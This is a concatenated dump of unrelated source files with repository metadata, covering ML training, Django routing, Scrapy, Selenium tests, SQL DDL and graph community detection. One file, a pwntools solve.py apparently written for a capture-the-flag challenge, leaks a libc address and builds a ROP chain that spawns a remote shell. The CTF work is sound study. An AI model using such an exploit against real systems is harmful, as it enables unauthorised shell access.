5f6125e1653f98b3cd435fbb27e389a8d9bf676d | c033b4bc0b80938192712a336a941f921b056106 | /PythonK/FirstPython/Actual/Chapter7/venv/Scripts/pip3.6-script.py | 8c4ea0adf094c7250d2fa2c3df53aa8e4c53ad4f | [] | no_license | BigBrou/Laboratory | 4e9a92cbccf2379c8fedb5abbb5dc896a477d018 | 2ec4ece91bf7d5774d7028c3ea620a36b279bfbb | refs/heads/master | 2020-03-24T16:48:25.017498 | 2018-12-27T09:04:13 | 2018-12-27T09:04:34 | 142,837,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py | #!C:\Laboratory\PythonK\Actual\Chapter7\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.6'
# Auto-generated setuptools console-script wrapper for pip in a virtualenv.
# Do not edit by hand: it is regenerated whenever pip is (re)installed.
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # strip the "-script.py"/".exe" suffix so pip sees a clean program name
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.6')()
    )
| [
"kangchoi21@gmail.com"
] | kangchoi21@gmail.com |
9ef1e707cfef298c980ba2d63f51efb5bc17c697 | 041de55260dabd8d00f3b54eb9514ac78b0d49fb | /train.py | 5f9d15b829d9949e49513257318d3ccfd6c96402 | [] | no_license | MikeynJerry/bert-glove-embeddings | 753f6bcf82337c94b30578ccabbf100a05f1ffd5 | 2f880334fe847691878d64289dfddc2afbc4df04 | refs/heads/main | 2023-03-04T14:43:20.118628 | 2021-02-10T06:26:29 | 2021-02-10T06:26:29 | 322,494,720 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,857 | py | """
Paper: https://arxiv.org/abs/2010.11869
Section 4.2: Training Word Piece Embeddings in GloVe Space
Description:
BERT Embeddings are not trained to keep semantically similar tokens close in
the embedding space. To reconcile this, we can train our own embeddings that
correspond to each token in BERT's word-piece vocabulary that lie in GloVe space.
This is useful for tasks such as finding similar tokens during adversarial attacks.
"""
import argparse
from itertools import chain
import json
import torch
from torch.optim import SGD
from torchtext.data import Field
from torchtext.datasets import IMDB
from torchtext.vocab import GloVe
from transformers import BertModel, BertTokenizer
from tqdm import tqdm, trange
def set_seed(seed, set_torch_cuda=False):
    """Seed torch's RNGs and force deterministic cuDNN behaviour.

    Args:
        seed: seed value for the CPU (and optionally CUDA) generators.
        set_torch_cuda: also seed the CUDA generator when True.
    """
    # Pin cuDNN to its deterministic kernels (and disable auto-tuning).
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    torch.manual_seed(seed)
    if set_torch_cuda:
        torch.cuda.manual_seed(seed)
def train(
    batch_size,
    bert_model,
    epochs,
    glove_dataset,
    glove_dim,
    save_file,
    seed,
    stats_file,
):
    """Learn GloVe-space embeddings for BERT's word-piece vocabulary.

    Solves E ≈ T @ E' by SGD on an L1 objective over words sampled from the
    IMDB corpus, where E is the GloVe embedding matrix, T maps each GloVe word
    to its BERT word pieces, and E' is the learned word-piece embedding matrix.
    Saves E' to ``save_file`` and, optionally, per-epoch losses to ``stats_file``.
    """
    device = "cuda" if torch.cuda.is_available() else "cpu"
    set_seed(seed, device == "cuda")
    # Pre-trained GloVe vectors plus both token<->id mappings.
    glove = GloVe(name=glove_dataset, dim=glove_dim)
    glove_embeddings = glove.vectors
    glove_ids_to_tokens = glove.itos
    glove_tokens_to_ids = glove.stoi
    # BERT is only needed here for its tokenizer and vocabulary size.
    bert_tokenizer = BertTokenizer.from_pretrained(bert_model)
    bert = BertModel.from_pretrained(bert_model)
    bert_embeddings = bert.embeddings.word_embeddings.weight
    # E (GloVe embeddings): (N, d)
    E = glove_embeddings.to(device)
    # T (Word piece tokenization indicator): (N, 30k)
    T = torch.zeros(
        (glove_embeddings.size(0), bert_embeddings.size(0)),
        dtype=torch.bool,
        device=device,
    )
    # E' (BERT GloVe Embeddings): (30k, d) — the trainable parameter.
    E_prime = torch.rand(
        (bert_embeddings.size(0), glove_embeddings.size(1)),
        dtype=torch.float32,
        device=device,
        requires_grad=True,
    )
    """
    Initialize T such that T[i, j] is 1 if word i is tokenized (using GloVe) to the
    j-th word piece (using BERT) and 0 otherwise.
    Example:
        'handyman' is tokenized by BERT to 'handy' and '##man'.
        'handyman' is token 29172 in GloVe while 'handy' and '##man' are
        tokens 18801 and 2386 respectively so T[29172, 18801] and T[29172, 2386]
        are 1 while the rest of T[29172, :] is 0
    """
    for glove_id, glove_token in enumerate(
        tqdm(glove_ids_to_tokens, desc="Building T")
    ):
        bert_tokens = bert_tokenizer.tokenize(glove_token)
        # If any of the word pieces aren't in GloVe's vocabulary, we'll ignore them
        # This really only applies to certain Unicode characters
        if "[UNK]" in bert_tokens:
            continue
        bert_ids = bert_tokenizer.convert_tokens_to_ids(bert_tokens)
        T[glove_id, bert_ids] = True
    # Load IMDB Corpus — provides a realistic word-frequency distribution to
    # sample training words from.
    text = Field(
        lower=BertTokenizer.pretrained_init_configuration[bert_model]["do_lower_case"],
        tokenize="spacy",
    )
    label = Field(sequential=False)
    train, test = IMDB.splits(text, label)
    # Flatten the corpus into a tensor of GloVe ids (unknown words dropped).
    corpus = torch.tensor(
        [
            glove_tokens_to_ids[token]
            for batch in chain(train, test)
            for token in batch.text
            if token in glove_tokens_to_ids
        ],
        dtype=torch.long,
        device=device,
    )
    losses = []
    # Train: each epoch samples batch_size corpus positions and minimises the
    # L1 distance between the GloVe vector and the sum of its word-piece vectors.
    optimizer = SGD([E_prime], lr=1e-4)
    for epoch in trange(epochs, desc="Training"):
        random_indices = torch.randperm(corpus.size(0))[:batch_size]
        random_samples = corpus[random_indices]
        optimizer.zero_grad()
        loss = torch.sum(
            torch.abs(
                E[random_samples] - T[random_samples].type(torch.float32) @ E_prime
            )
        )
        losses.append(loss.item())
        loss.backward()
        optimizer.step()
    # Optionally persist the loss curve for later inspection.
    if stats_file is not None:
        with open(stats_file, "w+") as f:
            json.dump(losses, f)
    torch.save(E_prime, save_file)
# Command-line interface: every hyper-parameter of train() is exposed as a flag
# with a sensible default, then forwarded as keyword arguments.
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--batch-size",
        default=5_000,
        help="The number of words to sample per training batch (default: %(default)s).",
        type=int,
    )
    parser.add_argument(
        "--bert-model",
        choices=BertTokenizer.pretrained_init_configuration.keys(),
        default="bert-base-uncased",
        help="The name of the pre-trained BERT model to use for tokenization (see: https://huggingface.co/transformers/pretrained_models.html, default: %(default)s)",
    )
    parser.add_argument(
        "--epochs",
        default=10_000,
        help="The number of training epochs to perform (default: %(default)s)",
        type=int,
    )
    parser.add_argument(
        "--glove-dim",
        default=200,
        help="The width of the GloVe word embeddings (default: %(default)s).",
        type=int,
    )
    parser.add_argument(
        "--glove-dataset",
        choices=GloVe.url.keys(),
        default="6B",
        help="The dataset GloVe trained on (see: https://nlp.stanford.edu/projects/glove/, default: %(default)s).",
    )
    parser.add_argument(
        "--save-file",
        default="bert_glove_embeddings.pt",
        help="The filename to save the trained embedding tensor to (default: %(default)s).",
    )
    parser.add_argument(
        "--seed",
        default=0,
        help="The seed used to for all torch randomization methods (default: %(default)s).",
        type=int,
    )
    parser.add_argument(
        "--stats-file", help="Where to save the per-epoch losses while training."
    )
    args = parser.parse_args()
    # argparse stores flags as attributes; unpack them into train()'s kwargs.
    train(**args.__dict__)
| [
"MikeynJerry@gmail.com"
] | MikeynJerry@gmail.com |
c7dec764dec68f162f3ec5a85ea862a15014b5c5 | 8ef458a868df9c729fa1f31e9b9c4b483c58770a | /todo/urls.py | b36e35d1800bd8450c991275e17ad1167f703692 | [] | no_license | FillGit/tztodo2 | a9fd0abb6c286f9949bb6ee7f6e25e6d03a6b85e | 61e0f38beb490a4fbc85c49129647fad108212dd | refs/heads/master | 2022-12-11T16:35:56.225656 | 2019-05-29T02:54:02 | 2019-05-29T02:54:02 | 189,139,161 | 0 | 0 | null | 2022-12-08T01:46:19 | 2019-05-29T02:51:29 | JavaScript | UTF-8 | Python | false | false | 1,481 | py | from django.urls import path
from django.conf.urls import url
from rest_framework.urlpatterns import format_suffix_patterns
#from rest_framework.authtoken import views
from todo import views
# URL routes for the todo API. Company-scoped routes capture the company name
# (and optionally a date) from the path; the dead routes below are kept from
# earlier iterations.
urlpatterns = [
    url(r'^todo/set-user-perm/$', views.SetUserPermission.as_view()),
    url(r'^users/$', views.UserList.as_view()),
    url(r'^todo/companies/$', views.CompanyList.as_view()),
    url(r'^todo/desks/$', views.DeskList.as_view()),
    url(r'^todo/(?P<name_company>\w+)/token', views.CustomAuthToken.as_view()),
    url(r'^todo/(?P<name_company>\w+)/desks', views.CompanyDeskList.as_view()),
    url(r'^todo/(?P<name_company>\w+)/(?P<date>[-\w]+)/$', views.CompanyDateList.as_view()),
    # NOTE(review): everything below is commented-out legacy routing; the stray
    # `"""` at the end of the last line is inside a comment and has no effect.
    #url(r'^todo/(?P<company>\w+)/(?P<idsession>\w+)/', views.CompanyList.as_view()),
    #url(r'^todo/(?P<pk>\w+)/$', views.company_todo),
    #url(r'^todo/done/(?P<pk>\w+)/$', views.todo_done),
    #url(r'^todo/detail/(?P<pk>\w+)/$', views.todo_detail),
    #url(r'^desks/$', views.desk_list),
    #url(r'^desks/detail/$', views.desk_detail),
    #url(r'^users/', views.UserList.as_view()),
    ##url(r'^auth/(?P<pk>\w+)/$', views.auth_user),
    #url(r'^users/(?P<pk>\d+)/$', views.UserDetail.as_view()),
    #url(r'^profile/(?P<pk>\d+)/$', views.ProfileDetail.as_view()),
    #url(r'^user/', views.UserDetail.as_view()),
    #url(r'^registration/', views.create_auth),
    #url(r'^test/$', views.TestDetail.as_view()),"""
]
# Allow format suffixes such as .json/.api on every route above.
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"moandcom@mail.ru"
] | moandcom@mail.ru |
615b0e3ce001a61de185b62a6465cb046a30fcc6 | 416baad7e83075c1c59f1fa920d9a18cd3351f16 | /tensor2tensor/models/__init__.py | 58badcb4e011ce3350c1cf88d2bd7a49cbdc8d59 | [
"Apache-2.0"
] | permissive | jmlingeman/tensor2tensor | aa759fc9101149284b0b6f2f7a03e9759b7214a9 | 9921c4a816aafb76964a960541045ce4d730b3c9 | refs/heads/master | 2021-04-29T01:52:38.283004 | 2018-04-23T20:04:12 | 2018-04-23T20:04:12 | 121,812,413 | 0 | 0 | null | 2018-02-16T23:39:11 | 2018-02-16T23:39:11 | null | UTF-8 | Python | false | false | 1,986 | py | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Models defined in T2T. Imports here force registration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
# pylint: disable=unused-import
from tensor2tensor.layers import modalities
from tensor2tensor.models import basic
from tensor2tensor.models import bytenet
from tensor2tensor.models import lstm
from tensor2tensor.models import neural_gpu
from tensor2tensor.models import resnet
from tensor2tensor.models import revnet
from tensor2tensor.models import shake_shake
from tensor2tensor.models import slicenet
from tensor2tensor.models import transformer
from tensor2tensor.models import vanilla_gan
from tensor2tensor.models import xception
from tensor2tensor.models.research import aligned
from tensor2tensor.models.research import attention_lm
from tensor2tensor.models.research import attention_lm_moe
from tensor2tensor.models.research import cycle_gan
from tensor2tensor.models.research import gene_expression
from tensor2tensor.models.research import multimodel
from tensor2tensor.models.research import super_lm
from tensor2tensor.models.research import transformer_moe
from tensor2tensor.models.research import transformer_revnet
from tensor2tensor.models.research import transformer_sketch
from tensor2tensor.models.research import transformer_vae
# pylint: enable=unused-import
| [
"rsepassi@google.com"
] | rsepassi@google.com |
1a195c5f10ae761b55203c69b12fcba3bdcadbea | 091b59690f8916b494de20f6354bab09b5bdbb4a | /PY/zhihu/爬虫/spyder/my_spider/my_spider/settings.py | ae170e07ea6dcb3aaf3f7c8dcc7a2b3a6f258e39 | [] | no_license | IRON-HAN/hanhan | e1203f9ab537c076f86150322d6e751c9c1555d9 | 3657b843134aad0b4e8be4ecdded89739b7c51b5 | refs/heads/master | 2020-08-24T09:11:15.396344 | 2020-06-17T07:09:32 | 2020-06-17T07:09:32 | 216,800,871 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,112 | py | # -*- coding: utf-8 -*-
# Scrapy settings for my_spider project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'my_spider'
SPIDER_MODULES = ['my_spider.spiders']
NEWSPIDER_MODULE = 'my_spider.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'my_spider (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'my_spider.middlewares.MySpiderSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'my_spider.middlewares.MySpiderDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'my_spider.pipelines.MySpiderPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"2674467254@qq.com"
] | 2674467254@qq.com |
76ec8bf5543ffb36898752bdb0bdcbe7ab1cea56 | 728f9ce8d8208ff6cff038d84ac77cce9749ce8a | /pages/product_page.py | 3e88d23d6896693971192289f89534f7f8e9f834 | [] | no_license | TopKesha/TestingProject | 7c1fb59cec4f54c1cb00fe2f7904ee9b191b2675 | 6cfa37954530173edb96feaa63450591c42911ea | refs/heads/master | 2021-07-15T09:42:02.948183 | 2020-03-19T10:57:33 | 2020-03-19T10:57:33 | 247,429,099 | 0 | 0 | null | 2021-06-02T01:11:20 | 2020-03-15T08:34:42 | Python | UTF-8 | Python | false | false | 2,104 | py | from .base_page import BasePage
from .locators import ProductPageLocators
from selenium.webdriver.common.by import By
class ProductPage(BasePage):
    """Page object for a single product page of the shop under test."""

    def should_add_to_basket(self):
        """Add the product to the basket and verify every success condition."""
        self.should_be_add_button()
        add_button = self.browser.find_element(*ProductPageLocators.BASKET_BUTTON)
        add_button.click()
        self.solve_quiz_and_get_code()
        self.should_be_same_product_in_added_product_message()
        self.should_be_message_about_success_discount()
        self.should_be_same_item_price_and_price_in_basket()

    def should_be_add_button(self):
        """The 'Add to basket' button must be present on the page."""
        assert self.is_element_present(*ProductPageLocators.BASKET_BUTTON), "Button Add to busket isn't found"

    def should_not_be_success_message(self):
        """No success message may be shown before the product is added."""
        assert self.is_not_element_present(*ProductPageLocators.SUCCESS_MESSAGE), \
            "Success message is presented, but should not be"

    def should_be_disappeared(self):
        """The success message must eventually disappear from the page."""
        assert self.is_disappeared(*ProductPageLocators.SUCCESS_MESSAGE), \
            "Success message isn't disappeared, but should be"

    def should_be_message_about_success_discount(self):
        """The discount banner must read exactly 'Deferred benefit offer'."""
        expected_text = "Deferred benefit offer"
        banner = self.browser.find_element(*ProductPageLocators.DISCOUNT_MSG)
        assert expected_text == banner.text, "There is no 'Deferred benefit offer' in discount message"

    def should_be_same_product_in_added_product_message(self):
        """The added-product notification must name the same product."""
        product_name = self.browser.find_element(*ProductPageLocators.PRODUCT).text
        message_name = self.browser.find_element(*ProductPageLocators.ADDED_PRODUCT_MSG).text
        assert product_name == message_name, "Product name and added product message do not match"

    def should_be_same_item_price_and_price_in_basket(self):
        """The basket total shown in the banner must equal the item price."""
        item_price = self.browser.find_element(*ProductPageLocators.ITEM_PRICE)
        basket_value_msg = self.browser.find_element(*ProductPageLocators.PRICE_IN_BASKET_MSG)
        assert item_price.text == basket_value_msg.text, \
            f"Item price and price in basket do not match \n expected {item_price.text}, got {basket_value_msg.text}"
"deregodub@gmail.com"
] | deregodub@gmail.com |
f103aafbf715a9b1e105825dc4bb9b2fe7adc430 | d7492659ff9ce2cb2772e79d480b595f91482fe2 | /finance/data/yahoo/ddl.py | bc223520587f40d3b2b2786bf4dae2828feddd91 | [] | no_license | StockScripts/fun-times-in-python | 8e02d4228a9cdf82618a64aa2d6a53e9584cae1a | 4b48f7c475c5efb220561fae919515ef1f78f592 | refs/heads/master | 2022-12-03T20:49:32.124000 | 2020-08-23T17:15:09 | 2020-08-23T17:15:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,225 | py | STOCKS = '''
CREATE TABLE yahoo.stocks (
ticker text,
date_time timestamp without time zone,
open numeric,
high numeric,
low numeric,
close numeric,
adj_close numeric,
volume bigint,
dividend numeric,
split_numerator integer,
split_denominator integer,
index text,
unix_timestamp text,
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
INCOME_STATEMENTS = '''
CREATE TABLE yahoo.income_statements (
date timestamp without time zone,
ticker text,
metric text,
val numeric(20,6),
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
BALANCE_SHEETS = '''
CREATE TABLE yahoo.balance_sheets (
date timestamp without time zone,
ticker text,
metric text,
val numeric(20,6),
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
CASH_FLOWS = '''
CREATE TABLE yahoo.cash_flows (
date timestamp without time zone,
ticker text,
metric text,
val numeric(20,6),
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
);
'''
SP_INDEX = '''
CREATE TABLE yahoo.sp_index (
index_name text,
market_datetime timestamp without time zone,
open numeric,
high numeric,
low numeric,
close numeric,
adj_close numeric,
volume bigint,
file_datetime timestamp without time zone,
ingest_datetime timestamp without time zone
)
'''
| [
"rbetzler@94.gmail.com"
] | rbetzler@94.gmail.com |
06f2d36fbb85bae7a5b684e93a760e88ee7b328d | de392462a549be77e5b3372fbd9ea6d7556f0282 | /accounts/migrations/0198_auto_20210812_1748.py | 26547e06f8a5011da9233e88c29c998430ef3246 | [] | no_license | amutebe/AMMS_General | 2830770b276e995eca97e37f50a7c51f482b2405 | 57b9b85ea2bdd272b44c59f222da8202d3173382 | refs/heads/main | 2023-07-17T02:06:36.862081 | 2021-08-28T19:07:17 | 2021-08-28T19:07:17 | 400,064,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | # Generated by Django 3.2.3 on 2021-08-12 14:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0197_auto_20210812_1740'),
]
operations = [
migrations.AlterField(
model_name='car',
name='car_number',
field=models.CharField(default='BCL12082021142', max_length=200, primary_key=True, serialize=False, verbose_name='Corrective action no.:'),
),
migrations.AlterField(
model_name='employees',
name='employeeID',
field=models.CharField(default='BCL11', max_length=20, primary_key=True, serialize=False, verbose_name='Employee ID'),
),
]
| [
"mutebe2@gmail.com"
] | mutebe2@gmail.com |
0cc944ad08606f283d0fd21ac183c8c897f213ab | 798fb70caa831fc091afcc68b0584a16201b776b | /pwn/gawr_gura/solve.py | ced45fa0d021d99b987db30f6055598c58f583e7 | [] | no_license | xuunnis123/ncu-ad-2021 | d26176147eacb7134887233eecf3521986dd0d58 | c061801835e4f2aa946e00326fdf65be15378450 | refs/heads/main | 2023-09-02T04:39:32.619649 | 2021-11-17T07:33:08 | 2021-11-17T07:33:08 | 428,971,719 | 3 | 0 | null | 2021-11-17T08:52:10 | 2021-11-17T08:52:09 | null | UTF-8 | Python | false | false | 1,212 | py | #!/usr/bin/python3
# -*- coding: UTF-8 -*-
from pwn import *
context.arch = 'amd64'
# p = process('./distribute/share/gawr_gura')
p = remote('ctf.adl.tw', 10003)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
pop_rax = 0x4a550
pop_rdi = 0x26b72
pop_rsi = 0x27529
pop_rdx_pop_r12 = 0x11c371
syscall = 0x2584d
bss = 0x407f00
read_again = 0x4017CC
leave_ret = 0x40185a
p.sendlineafter(b"7.) exit\n", b"5")
p.sendafter(b"What do you want to say?\n", cyclic(0x2c))
p.sendlineafter(b"7.) exit\n", b"6")
p.recvline()
p.recv(0x2c)
libc.address = u64((p.recv(6)).strip().ljust(8, b'\x00')) - \
libc.sym['_IO_2_1_stdout_']
success('libc base: 0x%x', libc.address)
payload = b'a'*80
payload += p64(bss)
payload += p64(read_again)
p.sendafter(b"Write on your suggestion. Thank you.\n", payload)
payload = p64(libc.address+pop_rdi)
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(libc.address+pop_rsi)
payload += p64(0)
payload += p64(libc.address+pop_rdx_pop_r12)
payload += p64(0)
payload += p64(0)
payload += p64(libc.address+pop_rax)
payload += p64(0x3b)
payload += p64(libc.address+syscall)
payload += p64(bss-0x58)
payload += p64(leave_ret)
p.sendline(payload)
p.interactive()
p.close()
| [
"opp556687@gmail.com"
] | opp556687@gmail.com |
281090431d5371b25cb5f61faa42b5ded0fee6a8 | b2ba670818623f8ab18162382f7394baed97b7cb | /test-data/AndroidSlicer/Carnote/DD/32.py | 4201f082c91275a5dd9fd6d0c08a4ab34f2b21ff | [
"MIT"
] | permissive | hsumyatwin/ESDroid-artifact | 012c26c40537a79b255da033e7b36d78086b743a | bff082c4daeeed62ceda3d715c07643203a0b44b | refs/heads/main | 2023-04-11T19:17:33.711133 | 2022-09-30T13:40:23 | 2022-09-30T13:40:23 | 303,378,286 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,140 | py | #start monkey test seedNo 0
import os;
from subprocess import Popen
from subprocess import PIPE
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice, MonkeyImage
from com.android.monkeyrunner.MonkeyDevice import takeSnapshot
from com.android.monkeyrunner.easy import EasyMonkeyDevice
from com.android.monkeyrunner.easy import By
from com.android.chimpchat.hierarchyviewer import HierarchyViewer
from com.android.monkeyrunner import MonkeyView
import random
import sys
import subprocess
from sys import exit
from random import randint
# Replays a recorded monkey-test session: launch the app's main activity and
# tap a fixed sequence of screen coordinates with half-second pauses.
# NOTE(review): the coordinates are device/resolution specific — confirm the
# emulator configuration before reusing this script.
device = MonkeyRunner.waitForConnection()
package = 'com.spisoft.quicknote'
activity ='com.spisoft.quicknote.MainActivity'
runComponent = package+'/'+activity
device.startActivity(component=runComponent)
MonkeyRunner.sleep(0.5)
MonkeyRunner.sleep(0.5)
device.touch(982,153, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(699,932, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(923,1695, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(963,1730, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(62,124, 'DOWN_AND_UP')
MonkeyRunner.sleep(0.5)
device.touch(467,678, 'DOWN_AND_UP')
| [
"hsumyatwin@gmail.com"
] | hsumyatwin@gmail.com |
ff38640ad5a4f55a1f83c27af699d4597b525d3d | 70f41a06d733e680af3bb1f00d8ff33574f4f4bb | /src/fh_tools/language_test/base_test/bisect_demo/grades_demo.py | 3c04e262f62fafdf04b345d787e0ae2cae0fa7b6 | [
"MIT"
] | permissive | mmmaaaggg/RefUtils | 209f7136acc63c880e60974c347e19adc4c7ac2e | f127658e75b5c52b4db105a22176ee0931ceacae | refs/heads/master | 2021-06-11T16:06:06.245275 | 2021-03-10T05:32:14 | 2021-03-10T05:32:14 | 139,413,962 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | #! /usr/bin/env python
# -*- coding:utf-8 -*-
"""
@author : MG
@Time : 19-8-9 上午10:33
@File : grades_demo.py
@contact : mmmaaaggg@163.com
@desc : 通过二分发计算分数等级
"""
import bisect
def grade(score, breakpoints=(60, 70, 80, 90), grades='FDCBA'):
    """Map a numeric score to a letter grade via binary search.

    Args:
        score: numeric score to classify.
        breakpoints: ascending grade boundaries; scores below the first
            boundary map to the first letter of ``grades``. Changed from a
            list to a tuple to avoid a mutable default argument.
        grades: one letter per band — exactly one more entry than
            ``breakpoints``.

    Returns:
        The single-character grade for ``score``.
    """
    # bisect returns how many boundaries the score reaches, which is exactly
    # the index of its band (a score equal to a boundary falls into the
    # higher band, e.g. 70 -> 'C').
    band = bisect.bisect(breakpoints, score)
    return grades[band]


# Quick demonstration; expected output: ['F', 'A', 'C', 'C', 'B', 'A', 'A'].
print([grade(score) for score in [33, 99, 77, 70, 89, 90, 100]])

if __name__ == "__main__":
    pass
| [
"mmmaaaggg@163.com"
] | mmmaaaggg@163.com |
0ae10a2b6e6b55491ec55d65a1c850dc3e3e6053 | 8354ba19cacacdc7162a86b7443453c594e8be86 | /list2/ex6/ex6.py | f87711a65fd80224405c90b3b49eaaf1656fb768 | [] | no_license | fvvsantana/complexNetworks | 459204e540f0497d34f1c796235549959456f33e | e89944c57fc3d6f55b96e8057b134297874ba291 | refs/heads/master | 2022-04-16T01:26:51.501647 | 2020-03-04T19:00:51 | 2020-03-04T19:00:51 | 207,572,665 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,210 | py | #| # Exercise 6
#| Import the libraries that we'll use
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
from networkx.algorithms import community
from networkx.algorithms.community import LFR_benchmark_graph
from community import community_louvain
from networkx.algorithms.community import greedy_modularity_communities
from networkx.algorithms.community import label_propagation_communities
from networkx.algorithms.community import asyn_lpa_communities
from sklearn.metrics import normalized_mutual_info_score
from sklearn.metrics import mutual_info_score
from sklearn.metrics import adjusted_mutual_info_score
import pandas as pd
from IPython.display import display, HTML, display_pretty
import os
np.random.seed(50)
#| ## Benchmark function
# Generate a graph for girvan newman benchmark
def benchmark_girvan_newman():
    """Build the LFR benchmark graph used as the Girvan-Newman test bed.

    128 nodes split into four planted communities of 32 nodes each,
    every node with degree 16, and a low mixing parameter (mu = 0.04),
    so the community structure is easy to recover.
    """
    return LFR_benchmark_graph(
        n=128,
        tau1=3,
        tau2=1.5,
        mu=0.04,
        min_degree=16,
        max_degree=16,
        min_community=32,
        max_community=32,
        seed=10,
    )
#| ## Method functions
# Louvain's community detection method
def detect_communities_louvain(G):
    """Louvain community detection.

    Returns a sorted list of communities, each community being a sorted
    list of node ids (same contract as before).

    The node -> community mapping returned by ``best_partition`` is now
    grouped in a single pass; the original rescanned the whole partition
    once per community (O(n * #communities)).
    """
    partition = community_louvain.best_partition(G)
    groups = {}
    for node, com in partition.items():
        # dict.setdefault groups nodes by community id in O(n) total.
        groups.setdefault(com, []).append(node)
    return sorted(sorted(nodes) for nodes in groups.values())
# Girvan Newman's community detection method
def detect_communities_girvan_newman(G):
    """Girvan-Newman community detection (first split only).

    ``community.girvan_newman`` yields successive, increasingly fine
    partitions; only the first one is taken here.
    """
    first_partition = next(community.girvan_newman(G))
    return sorted(sorted(nodes) for nodes in first_partition)
# Fast Greedy community detection method
def detect_communities_greedy(G):
    """Fast-greedy (Clauset-Newman-Moore) modularity maximisation."""
    detected = greedy_modularity_communities(G)
    # Normalise to a sorted list of sorted node lists.
    return sorted(sorted(c) for c in detected)
# Label propagation community detection method
def detect_communities_label_propagation(G):
    """Label-propagation community detection (synchronous variant).

    ``asyn_lpa_communities`` is the asynchronous alternative; the
    synchronous ``label_propagation_communities`` is used here, exactly
    as in the original implementation.
    """
    return sorted(sorted(c) for c in label_propagation_communities(G))
#| ## Function to plot communities
# Plot graph with communities, receives a list of communities, where each community is a list of nodes (ints)
def show_communities(G, communities, name='title'):
